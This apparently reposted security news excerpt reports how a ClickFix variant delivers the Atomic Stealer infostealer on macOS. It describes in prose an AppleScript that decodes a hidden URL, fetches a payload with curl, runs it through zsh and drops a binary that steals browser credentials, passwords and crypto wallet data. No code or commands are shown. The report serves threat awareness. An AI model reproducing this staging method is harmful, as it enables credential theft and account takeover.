Lightweight staging for Atomic Stealer: Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload using ‘curl’, and executes it via ‘zsh’. From here, standard info-stealing takes over with a ‘Mach-O’ binary written to a temporary location, its attributes adjusted, permissions set, and execution triggered.This binary is a new variant of the Atomic Stealer.The researchers noted that the staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It is modular, quick to update, and harder to catch at the first stage.Atomic Stealer’s objectives are consistent with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, crypto wallet data, and developer artifacts. Previous reporting has shown that such stealers rarely operate in isolation, as exfiltrated data is almost always funneled into credential reuse attacks and account takeovers.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4156500/new-clickfix-variant-bypasses-apple-safeguards-with-one%e2%80%91click-script-execution.html
